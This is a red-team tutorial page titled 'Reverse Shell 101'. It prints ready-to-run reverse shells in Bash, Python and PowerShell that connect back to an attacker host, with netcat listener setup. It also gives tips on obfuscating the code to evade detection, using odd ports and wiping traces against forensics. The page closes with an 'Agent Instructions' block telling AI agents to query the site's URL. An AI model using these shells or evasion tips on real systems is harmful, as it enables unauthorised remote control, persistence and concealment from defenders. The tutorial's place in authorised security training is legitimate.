# Reverse Shell 101

**Reverse Shell 101: Practical Insights for Red Teamers**

In the dynamic world of red teaming, mastering the use of reverse shells is crucial for maintaining access, maneuvering within a network, and escalating privileges stealthily. This section is designed to focus less on theoretical aspects and more on practical, real-world examples to empower red teamers with actionable skills.

#### **Understanding Reverse Shells**

A reverse shell is a type of shell where the target machine opens a connection to an attacking machine, which then has the ability to execute commands on the target. This is particularly useful in bypassing firewall rules that may block incoming connections but allow outgoing ones.

#### **Setting Up a Basic Reverse Shell**

**Example 1: Bash Reverse Shell** One of the simplest forms of reverse shells is using Bash. This can be effective in environments where Bash is available, and network restrictions are minimal.

```bash
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
```

**Setup:**

* **Attacker Machine (Kali Linux)**: Use `nc -lvnp 4444` to listen on port 4444.
* **Target Machine**: Execute the above Bash command replacing `attacker_ip` with the IP address of the attacker's machine.

#### **Python Reverse Shell**

**Example 2: Python Reverse Shell** Python's extensive standard library allows for the creation of a reverse shell with just a few lines of code.

```python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker_ip",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
```

**Setup:**

* **Attacker Machine**: Start a listener with `nc -lvnp 1234`.
* **Target Machine**: Run the Python script after replacing `attacker_ip` with the attacker's IP.

#### **PowerShell Reverse Shell**

**Example 3: Windows PowerShell Reverse Shell** PowerShell provides a powerful platform for Windows environments.

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell"><strong>$Client = New-Object System.Net.Sockets.TCPClient("192.168.56.1", 4444);$Stream =$Client.GetStream();[byte[]]$Buffer = New-Object byte[] 1024;while(($I =$Stream.Read($Buffer, 0, 1024)) -ne 0){$Data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($Buffer,0, $I);$SendBack = (iex $Data 2>&#x26;1 | Out-String );    $SendBack2  = $SendBack + 'PS ' + (pwd).Path + '> ';$SendByte = ([text.encoding]::ASCII).GetBytes($SendBack2);$Stream.Write($SendByte,0,$SendByte.Length);$Stream.Flush();}$Client.Close();
</strong></code></pre>

**Setup:**

* **Attacker Machine**: Listen on the specified port using `nc -lvnp 4445`.
* **Target Machine**: Execute the PowerShell command.

#### **Real-World Application Scenarios**

* **Scenario 1: Post-Exploitation Data Exfiltration** After gaining initial access through a phishing attack, a reverse shell is established to move laterally within the network, searching for sensitive data to exfiltrate.
* **Scenario 2: Maintaining Persistence** Reverse shells can be integrated into scheduled tasks or services to ensure persistence even after system restarts, providing continued access for ongoing exploitation.
* **Scenario 3: Bypassing Endpoint Protection** Advanced reverse shells can be encoded or encrypted to evade antivirus detection, often using tools like `shikata_ga_nai` encoder in Metasploit or custom encryption routines.

<figure><img src="/files/eeEs4oziOWolK6c1j2t8" alt=""><figcaption><p><em>Example of a reverse connection established by an Attacker</em></p></figcaption></figure>

<figure><img src="/files/FCdloHFeDh407ynWvr7S" alt=""><figcaption><p><em>Example of reverse shell using Windows Powershell</em></p></figcaption></figure>

**Tips for Effective Use**

* **Obfuscation**: Always obfuscate the reverse shell code to avoid detection by network monitoring tools.
* **Randomize Ports**: Use non-standard ports for reverse shells to avoid typical firewall rules.
* **Cleanup**: Ensure to remove traces of the reverse shell after use to avoid detection during forensic analysis.

#### **Conclusion**

Understanding and implementing reverse shells are fundamental skills for any red teamer. By practicing these examples in controlled environments and adapting them to specific target scenarios, red teamers can enhance their capability to perform comprehensive security assessments and effectively demonstrate real-world attack vectors.

This hands-on approach ensures that red teamers are not only familiar with the theory but are also adept at applying these techniques in real-world scenarios to achieve their objectives efficiently and stealthily.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.redteamgarage.com/reverse-shell-101.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.